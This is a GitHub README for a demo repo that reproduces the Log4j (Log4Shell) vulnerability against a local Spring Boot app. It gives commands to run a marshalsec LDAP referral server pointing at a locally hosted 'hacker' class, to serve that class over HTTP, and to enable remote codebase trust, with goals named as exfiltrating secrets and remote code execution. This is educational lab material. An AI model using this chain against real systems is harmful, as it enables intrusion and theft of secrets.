log4j-exploit-demo

This code base has the code for reproducing the log4j vulnerability in the spring boot app.

Steps to Reproduce the Log4j vulnerability

• Clone this repo in to your local machine

git@github.com:dilipsundarraj1/log4j-exploit-demo.git

• Import the projects in to Intellij

Vulnerability #1 : Exporting Secrets to Hacker Machine

Start the greeting-service

• This will run the app in port 8080. Make sure you have this port available

Start the LDAP Server(marshalsec)

• Import the project in to Intellij

• Build the project using Maven

  • Build From Terminal, use the below command

  mvn clean package -DskipTests
  

  • Build in Intellij, use the below command

  clean package -DskipTests
  

• Run the below command to start up the ldap server

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Log4jRCE"

• This should start up the LDAP server in port 1389

Vulnerability #2 : Remote Code Execution

Make changes greeting-service

• Add the below System property in the GreetingsServiceApplication class
  • This is to enable the LDAP call invocation in the JVM

System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true")

Start the Remote Server hosting the Factory class

• Import the hacker-remote-server module in intellj

• Start the simple http server using the below command

python3 -m http.server

Reference Repos

• hacker-remote-server
  • This repo hosts the Compiled Java code which is the actual code that gets executed in the Target JVM
• marshalsec
  • This repo holds the source code for spinning up an LDAP Server in our local